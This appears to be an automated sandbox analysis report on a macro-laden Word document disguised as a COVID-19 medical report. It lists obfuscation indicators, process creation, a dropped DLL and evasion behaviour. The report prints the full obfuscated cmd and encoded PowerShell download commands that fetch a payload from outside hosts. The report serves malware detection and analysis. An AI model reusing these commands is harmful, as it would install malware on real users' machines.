                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
                      Source: IU-8549 Medical report COVID-19.docInitial sample: OLE summary subject = Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: IU-8549 Medical report COVID-19.docStream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7
                      Document contains an embedded VBA with many randomly named variablesShow sources
                      Source: IU-8549 Medical report COVID-19.docStream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: IU-8549 Medical report COVID-19.docStream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: E6_R.dll.5.drStatic PE information: real checksum: 0x5c618 should be: 0x5db58
                      Source: E6_R.dll.5.drStatic PE information: section name: .text4
                      Source: E6_R.dll.5.drStatic PE information: section name: .text8
                      Source: E6_R.dll.5.drStatic PE information: section name: .text7
                      Source: E6_R.dll.5.drStatic PE information: section name: .text6
                      Source: E6_R.dll.5.drStatic PE information: section name: .text5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022FED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00211155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002121EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00213391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00210C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002117A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0028FED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00271155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002721EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00273391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00270C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002717A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0014FED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00131155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001321EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00133391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00130C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001317A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019FED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00181155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001821EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00183391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00180C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001817A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CFED0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B1155 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B21EC pushad ; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B3391 push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0C18 pushfd ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B17A1 push ds; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0011FED0 push edx; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Dgmlr\ngcj.edaJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dgmlr\ngcj.eda:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
